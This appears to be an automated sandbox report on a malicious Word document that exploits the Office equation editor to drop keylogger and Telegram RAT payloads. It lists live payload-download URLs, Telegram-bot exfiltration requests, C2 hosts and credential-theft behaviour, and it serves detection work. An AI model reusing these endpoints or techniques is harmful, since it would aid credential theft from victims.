                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                Source: Yara matchFile source: 10.2.swagodi78811.scr.316cb90.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 20.2.swagodi78811.scr.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.swagodi78811.scr.3129570.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.swagodi78811.scr.316cb90.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.swagodi78811.scr.3129570.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000014.00000002.663140063.000000000043C000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.412121084.0000000003129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: swagodi78811.scr PID: 3468, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: swagodi78811.scr PID: 3880, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: gRpkBp.exe PID: 2060, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected Snake Keylogger
                Source: Yara matchFile source: 00000014.00000002.663684485.00000000023F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.663663825.00000000022F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Yara detected Telegram RAT
                Source: Yara matchFile source: 10.2.swagodi78811.scr.316cb90.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 20.2.swagodi78811.scr.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.swagodi78811.scr.3129570.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.swagodi78811.scr.316cb90.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.swagodi78811.scr.3129570.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000014.00000002.663140063.000000000042B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.412121084.0000000003129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: swagodi78811.scr PID: 3468, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: swagodi78811.scr PID: 3880, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: gRpkBp.exe PID: 2060, type: MEMORYSTR
                Yara detected VIP Keylogger
                Source: Yara matchFile source: 10.2.swagodi78811.scr.316cb90.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 20.2.swagodi78811.scr.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.swagodi78811.scr.3129570.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.swagodi78811.scr.316cb90.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.swagodi78811.scr.3129570.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000014.00000002.663140063.000000000042B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.412121084.0000000003129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: swagodi78811.scr PID: 3468, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: swagodi78811.scr PID: 3880, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information1
                Scripting                		Valid Accounts33
                Exploitation for Client Execution                		1
                Scripting                		1
                DLL Side-Loading                		11
                Disable or Modify Tools                		1
                OS Credential Dumping                		1
                File and Directory Discovery                		Remote Services1
                Archive Collected Data                		1
                Web Service                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		111
                Process Injection                		3
                Obfuscated Files or Information                		LSASS Memory13
                System Information Discovery                		Remote Desktop Protocol1
                Data from Local System                		4
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                Scheduled Task/Job                		1
                Scheduled Task/Job                		1
                Scheduled Task/Job                		1
                Install Root Certificate                		Security Account Manager1
                Process Discovery                		SMB/Windows Admin Shares1
                Email Collection                		11
                Encrypted Channel                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                Software Packing                		NTDS31
                Virtualization/Sandbox Evasion                		Distributed Component Object ModelInput Capture3
                Non-Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                DLL Side-Loading                		LSA Secrets1
                Application Window Discovery                		SSHKeylogging14
                Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                Masquerading                		Cached Domain Credentials1
                Remote System Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                Virtualization/Sandbox Evasion                		DCSync1
                System Network Configuration Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
                Process Injection                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1483266 Sample: order072724.docx.doc Startdate: 26/07/2024 Architecture: WINDOWS Score: 100 62 meridianresourcellc.top 2->62 90 Found malware configuration 2->90 92 Malicious sample detected (through community Yara rule) 2->92 94 Antivirus detection for URL or domain 2->94 96 20 other signatures 2->96 9 WINWORD.EXE 313 54 2->9         started        14 taskeng.exe 2->14         started        signatures3 process4 dnsIp5 70 meridianresourcellc.top 104.21.52.88, 443, 49161, 49163 CLOUDFLARENETUS United States 9->70 72 172.67.197.72, 443, 49162, 49169 CLOUDFLARENETUS United States 9->72 54 C:\Users\user\AppData\...\swagodi.doc.url, MS 9->54 dropped 56 C:\Users\user\...\meridianresourcellc.top.url, MS 9->56 dropped 58 ~WRF{1C83C99B-998E...4-E69763DD529E}.tmp, Composite 9->58 dropped 120 Microsoft Office launches external ms-search protocol handler (WebDAV) 9->120 122 Office viewer loads remote template 9->122 124 Microsoft Office drops suspicious files 9->124 16 EQNEDT32.EXE 11 9->16         started        21 gRpkBp.exe 14->21         started        file6 signatures7 process8 dnsIp9 60 meridianresourcellc.top 16->60 46 C:\Users\user\AppData\...\swagodi78811.scr, PE32 16->46 dropped 48 C:\Users\user\AppData\...\swagodi[1].scr, PE32 16->48 dropped 80 Office equation editor establishes network connection 16->80 82 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 16->82 23 swagodi78811.scr 5 16->23         started        84 Machine Learning detection for dropped file 21->84 86 Adds a directory exclusion to Windows Defender 21->86 88 Injects a PE file into a foreign processes 21->88 27 gRpkBp.exe 21->27         started        30 powershell.exe 21->30         started        32 powershell.exe 21->32         started        34 schtasks.exe 21->34         started        file10 signatures11 process12 dnsIp13 50 C:\Users\user\AppData\Roaming\gRpkBp.exe, PE32 23->50 dropped 52 C:\Users\user\AppData\Local\...\tmpD135.tmp, XML 23->52 dropped 104 Machine Learning detection for dropped file 23->104 106 Uses schtasks.exe or at.exe to add and modify task schedules 23->106 108 Adds a directory exclusion to Windows Defender 23->108 110 Injects a PE file into a foreign processes 23->110 36 swagodi78811.scr 12 2 23->36         started        40 powershell.exe 4 23->40         started        42 powershell.exe 4 23->42         started        44 2 other processes 23->44 74 reallyfreegeoip.org 27->74 76 api.telegram.org 27->76 78 3 other IPs or domains 27->78 112 Tries to steal Mail credentials (via file / registry access) 27->112 114 Tries to harvest and steal browser information (history, passwords, etc) 27->114 file14 116 Tries to detect the country of the analysis system (by using the IP) 74->116 118 Uses the Telegram API (likely for C&C communication) 76->118 signatures15 process16 dnsIp17 64 api.telegram.org 36->64 66 api.telegram.org 149.154.167.220, 443, 49194, 49203 TELEGRAMRU United Kingdom 36->66 68 7 other IPs or domains 36->68 98 Tries to steal Mail credentials (via file / registry access) 36->98 100 Installs new ROOT certificates 40->100 signatures18 102 Uses the Telegram API (likely for C&C communication) 64->102

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                order072724.docx.doc42%ReversingLabsDocument-Office.Exploit.CVE-2017-0199

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{1C83C99B-998E-4DEF-B324-E69763DD529E}.tmp100%AviraEXP/CVE-2018-0798.Gen
                C:\Users\user\AppData\Roaming\swagodi78811.scr100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\gRpkBp.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\swagodi[1].scr100%Joe Sandbox ML

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://ocsp.entrust.net030%URL Reputationsafe
                http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                http://checkip.dyndns.org/0%URL Reputationsafe
                http://checkip.dyndns.org/q0%URL Reputationsafe
                http://reallyfreegeoip.org0%URL Reputationsafe
                http://checkip.dyndns.com0%URL Reputationsafe
                http://ocsp.entrust.net0D0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                https://reallyfreegeoip.org/xml/0%URL Reputationsafe
                http://crl.entrust.net/server1.crl00%URL Reputationsafe
                http://checkip.dyndns.org0%URL Reputationsafe
                https://reallyfreegeoip.org/xml/8.46.123.330%URL Reputationsafe
                https://www.chiark.greenend.org.uk/~sgtatham/putty/00%URL Reputationsafe
                https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                https://reallyfreegeoip.org0%URL Reputationsafe
                https://secure.comodo.com/CPS00%URL Reputationsafe
                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
                https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
                https://api.telegram.org0%Avira URL Cloudsafe
                http://reallyfreegeoip.orgX0%Avira URL Cloudsafe
                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:528110%0D%0ADate%20a0%Avira URL Cloudsafe
                https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dwmf%2B5.1%26oq%3Dwmf0%Avira URL Cloudsafe
                https://api.telegram.org/bot0%Avira URL Cloudsafe
                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%Avira URL Cloudsafe
                https://meridianresourcellc.top/swagodi.scrj100%Avira URL Cloudmalware
                http://api.telegram.orgX0%Avira URL Cloudsafe
                https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
                https://reallyfreegeoip.org/xml/8.46.123.3340%Avira URL Cloudsafe
                https://meridianresourcellc.top/swagodi.scrsoC:100%Avira URL Cloudmalware
                https://www.google.com/search?q=wmf0%Avira URL Cloudsafe
                https://download.visualstud0%Avira URL Cloudsafe
                https://meridianresourcellc.top/100%Avira URL Cloudmalware
                http://varders.kozow.com:80810%Avira URL Cloudsafe
                http://checkip.dyndns.org/X0%Avira URL Cloudsafe
                https://meridianresourcellc.top/swagodi.doc100%Avira URL Cloudphishing
                https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j46j0l3j46j0.427j0j7&sourceid=chrome&i0%Avira URL Cloudsafe
                https://meridianresourcellc.top/swagodi.scr100%Avira URL Cloudmalware
                https://reallyfreegeoip.org/xml/8.46.123.330Kp0%Avira URL Cloudsafe
                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
                http://schemas.microsoftXT7/windows/2004/02/mit/tas0%Avira URL Cloudsafe
                http://ocsp.c0%Avira URL Cloudsafe
                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:528110%0D%0ADate%20and%20Time:%207/27/2024%20/%207:26:36%20AM%0D%0ACountry%20Name:%20United%20States%0D%0A[%20528110%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20]0%Avira URL Cloudsafe
                https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search0%Avira URL Cloudsafe
                https://api.telegram.org/bot/sendMessage?chat_id=&text=0%Avira URL Cloudsafe
                https://www.google.com/favicon.ico0%Avira URL Cloudsafe
                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:528110%0D%0ADate%20and%20Time:%207/27/2024%20/%2010:06:41%20AM%0D%0ACountry%20Name:%20United%20States%0D%0A[%20528110%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20]0%Avira URL Cloudsafe
                http://aborters.duckdns.org:80810%Avira URL Cloudsafe
                http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%Avira URL Cloudsafe
                https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtest%26oq%3Dtest%26a0%Avira URL Cloudsafe
                https://meridianresourcellc.top/swagodi.scrllC:100%Avira URL Cloudmalware
                https://www.google.com/sorry/index0%Avira URL Cloudsafe
                http://anotherarmy.dns.army:8081100%Avira URL Cloudmalware
                https://www.google.com/search?q=net0%Avira URL Cloudsafe
                https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%Avira URL Cloudsafe
                http://api.telegram.org0%Avira URL Cloudsafe
                http://checkip.dyndns.comX0%Avira URL Cloudsafe
                http://checkip.dyndns.orgX0%Avira URL Cloudsafe
                https://www.google.com/sorry/indextest0%Avira URL Cloudsafe
                http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                meridianresourcellc.top
                		104.21.52.88
                		truetrue
                  		unknown
                  reallyfreegeoip.org
                  		188.114.97.3
                  		truetrue
                    		unknown
                    api.telegram.org
                    		149.154.167.220
                    		truetrue
                      		unknown
                      checkip.dyndns.com
                      		132.226.247.73
                      		truefalse
                        		unknown
                        checkip.dyndns.org
                        		unknown
                        		unknowntrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://checkip.dyndns.org/false
                          • URL Reputation: safe
                          		unknown
                          https://meridianresourcellc.top/swagodi.doctrue
                          • Avira URL Cloud: phishing
                          		unknown
                          https://meridianresourcellc.top/swagodi.scrtrue
                          • Avira URL Cloud: malware
                          		unknown
                          https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:528110%0D%0ADate%20and%20Time:%207/27/2024%20/%207:26:36%20AM%0D%0ACountry%20Name:%20United%20States%0D%0A[%20528110%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20]false
                          • Avira URL Cloud: safe
                          		unknown
                          https://reallyfreegeoip.org/xml/8.46.123.33false
                          • URL Reputation: safe
                          		unknown
                          https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:528110%0D%0ADate%20and%20Time:%207/27/2024%20/%2010:06:41%20AM%0D%0ACountry%20Name:%20United%20States%0D%0A[%20528110%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20]false
                          • Avira URL Cloud: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://reallyfreegeoip.orgXswagodi78811.scr, 00000014.00000002.663684485.0000000002540000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000024B4000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002595000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002586000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000255E000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000254E000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000252B000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002493000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002482000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000023B1000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000243E000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002457000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000242C000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002449000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000024A1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://duckduckgo.com/chrome_newtabswagodi78811.scr, 00000014.00000002.663684485.0000000002683000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002670000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000026C4000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000025D2000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.000000000336B000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.00000000033B7000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002591000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000257E000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000025BF000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://duckduckgo.com/ac/?q=swagodi78811.scr, 00000014.00000002.663684485.0000000002683000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002670000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000026C4000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000025D2000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.000000000336B000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.00000000033B7000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002591000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000257E000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000025BF000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dwmf%2B5.1%26oq%3DwmfgRpkBp.exe, 0000001D.00000002.664487526.0000000003453000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.00000000034CF000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.00000000034C2000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.0000000003468000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://api.telegram.orgswagodi78811.scr, 00000014.00000002.663684485.00000000025A4000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000024B0000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://api.telegram.org/botswagodi78811.scr, 0000000A.00000002.412121084.0000000003129000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000025A4000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663140063.000000000042B000.00000040.00000400.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000024B0000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://meridianresourcellc.top/swagodi.scrjEQNEDT32.EXE, 00000009.00000002.392933618.000000000054F000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          http://api.telegram.orgXswagodi78811.scr, 00000014.00000002.663684485.00000000025A4000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000024B0000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://ocsp.entrust.net03EQNEDT32.EXE, 00000009.00000002.392933618.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.392933618.000000000054F000.00000004.00000020.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663426332.000000000079D000.00000004.00000020.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663315507.000000000077C000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0EQNEDT32.EXE, 00000009.00000002.392933618.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663426332.000000000079D000.00000004.00000020.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663315507.000000000077C000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.diginotar.nl/cps/pkioverheid0EQNEDT32.EXE, 00000009.00000002.392933618.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663426332.000000000079D000.00000004.00000020.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663315507.000000000077C000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:528110%0D%0ADate%20aswagodi78811.scr, 00000014.00000002.663684485.00000000025A4000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000024B0000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://reallyfreegeoip.org/xml/8.46.123.334swagodi78811.scr, 00000014.00000002.663684485.0000000002540000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002595000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002586000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000024DB000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000255E000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000254E000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000252B000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002493000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002482000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000243E000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002457000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000242C000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002449000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000024A1000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000023DB000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://meridianresourcellc.top/swagodi.scrsoC:EQNEDT32.EXE, 00000009.00000002.393794677.00000000042A0000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          http://varders.kozow.com:8081swagodi78811.scr, 0000000A.00000002.412121084.0000000003129000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663140063.000000000042B000.00000040.00000400.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000023F1000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000022F1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://meridianresourcellc.top/EQNEDT32.EXE, EQNEDT32.EXE, 00000009.00000002.392933618.000000000054F000.00000004.00000020.00020000.00000000.sdmp, meridianresourcellc.top.url.0.drtrue
                          • Avira URL Cloud: malware
                          		unknown
                          https://www.google.com/search?q=wmfgRpkBp.exe, 0000001D.00000002.664487526.0000000003468000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://checkip.dyndns.org/qswagodi78811.scr, 0000000A.00000002.412121084.0000000003129000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663140063.000000000042B000.00000040.00000400.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://reallyfreegeoip.orgswagodi78811.scr, 00000014.00000002.663684485.0000000002540000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000024B4000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002595000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002586000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000255E000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000254E000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000252B000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002493000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002482000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000023B1000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000243E000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002457000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000242C000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002449000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000024A1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
